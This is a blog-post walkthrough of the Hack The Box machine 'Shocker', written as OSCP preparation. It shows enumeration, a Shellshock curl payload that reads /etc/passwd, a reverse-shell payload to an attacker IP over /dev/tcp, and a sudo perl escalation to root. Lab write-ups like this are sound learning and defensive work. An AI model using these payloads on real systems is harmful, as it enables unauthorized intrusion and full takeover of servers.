Path to OSCP: Shocker

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Shocker. We begin with nmap (shocker!):

u01@nostromo:~$ nmap -p- -A shocker.htb -oA HTB/shocker/shocker
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 10:17 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.03 seconds

We have an Apache webserver on port 80 and an OpenSSH server on non-standard port 2222, running on Ubuntu. Checking out the webpage we see the following:

Page source has no further leads, so we crack out gobuster to see what directories and files might be publicly accessible. While that’s running I check the versions of Apache and OpenSSH for any vulnerabilities. A couple of interesting results we’ll dig into further:

u01@nostromo:~$ searchsploit openssh 7.2
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH 7.2 - Denial of Service | linux/dos/40888.py
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------


u01@nostromo:~$ searchsploit apache 2.4.18
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation | linux/local/46676.php
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl
------------------------------------------------------------------------------------------------------------------------- ---------------------------------

I’m curious about the username enumeration on OpenSSH, since the version matches exactly, so I try “OpenSSH 7.2p2 – Username Enumeration | linux/remote/40136.py”. As is common with these older boxes through, I run into trouble with Python 2 scripts not running correctly under Python 3. I try specifying python2, running under Python virtual environment, and using 2to3 to convert, but no luck. Running Python 2 scripts on modern Kali seems very hit and miss, despite having two solutions in the form of virtual environmnets and 2to3, so I’m hoping that in the actual OSCP (and as we encounter more recent boxes), Python 2.x exploits will become less common in favour of Python 3.

Anyway, I move on from the username enumeration for now. Gobuster has completed with no hits, which is a little unusual and suspect. I kick off gobuster again, this time including Status 403 for any forbidden files/directories, and this gives me a hit against two directories:

u01@nostromo:~/HTB/shocker$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 403,200 -b "" -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://shocker.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 403,200
[+] User Agent: gobuster/3.6
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 294]
/icons/ (Status: 403) [Size: 292]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

It goes without saying /cgi-bin/ is the most interesting from these two, as it potentially contains viewable scripts. I search for “cgi-bin exploit”, and come across old reliable HackTricks, with an article on CGI. It contains a short section on the Shellshock vulnerability. Given the box name of “Shocker”, it’s pretty obvious this is the right path. The article mentions an nmap script which can be used to test for vulnerability. It requires a script file in the cgi-bin directory, so I’m very certain we’re on the right track now and just need to do some deep enumeration to find an appropriate file. With that in mind, I kick off a gobuster scan against cgi-bin that includes common scripting extensions; .cgi, .pl, .py, .sh. We get a hit on user.sh:

u01@nostromo:~$ gobuster dir -u http://shocker.htb/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x cgi,pl,py,sh 
=============================================================== 
Gobuster v3.6 
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) 
=============================================================== 
[+] Url: http://shocker.htb/cgi-bin/ 
[+] Method: GET 
[+] Threads: 10 
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 
[+] Negative Status codes: 404 
[+] User Agent: gobuster/3.6 
[+] Extensions: cgi,pl,py,sh 
[+] Timeout: 10s 
=============================================================== 
Starting gobuster in directory enumeration mode 
=============================================================== 
/user.sh (Status: 200) [Size: 118]

We can then plug this into the nmap command:

u01@nostromo:~/HTB/shocker$ nmap shocker.htb -p 80 --script=http-shellshock --script-args uri=/cgi-bin/user.sh
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 12:58 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.027s latency).

PORT STATE SERVICE
80/tcp open http
| http-shellshock: 
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
| 
| Disclosure date: 2014-09-24
| References:
| http://seclists.org/oss-sec/2014/q3/685
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

 

The box is indeed vulnerable to Shellshock. GitHub repo opsxcq/exploit-CVE-2014-6271: Shellshock exploit + vulnerable environment (github.com) has a nice single line curl POC, which we run to confirm remote command access:

u01@nostromo:~/HTB/shocker$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://shocker.htb/cgi-bin/user.sh

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash

We modify this curl command to generate a bash reverse shell to an listening netcat:

u01@nostromo:~$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/7777 0>&1'" \
http://shocker.htb/cgi-bin/user.sh

And we get a shell as user shelly, allowing us to retrieve the user.txt flag from shelly’s home directory:

u01@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.56] 39216
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$

We check sudo permissions for shelly, and perl is executable as root with no password:

shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/usr/lib/cgi-bin$

GTFOBins has a straightforward command to drop from perl into a root shell using this sudo privilege:

And sure enough we’re in as root to obtain root.txt

shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";' 
sudo perl -e 'exec "/bin/sh";' 
id 
uid=0(root) gid=0(root) groups=0(root) 
ls -l /root/ 
total 4 
-r-------- 1 root root 33 Sep 15 05:11 root.txt

Takeaway for OSCP

My first impression of this box was one of frustration and it being a little too “CTF-like” for OSCP or real-life penetration testing. The initial enumeration for the user.sh file is very easy to miss, and it took me many attempts to even find the initial /cgi-bin/ as the correct attack vector. But after a bit of thought, I realise the initial enumeration was difficult only because of my lack of understanding of common Apache directories and their purpose. This was also a good box to remind me not to be lazy with directory fuzzing. It’s all too easy to just launch a default gobuster or ffuf scan without giving it a second thought. I feel the majority of the time for HTB this is sufficient, but in cases like Shocker it will lead you to missing a key clue towards exploitation. Not a box I enjoyed much, but some good lessons learnt.

Leave a Reply

Your email address will not be published. Required fields are marked *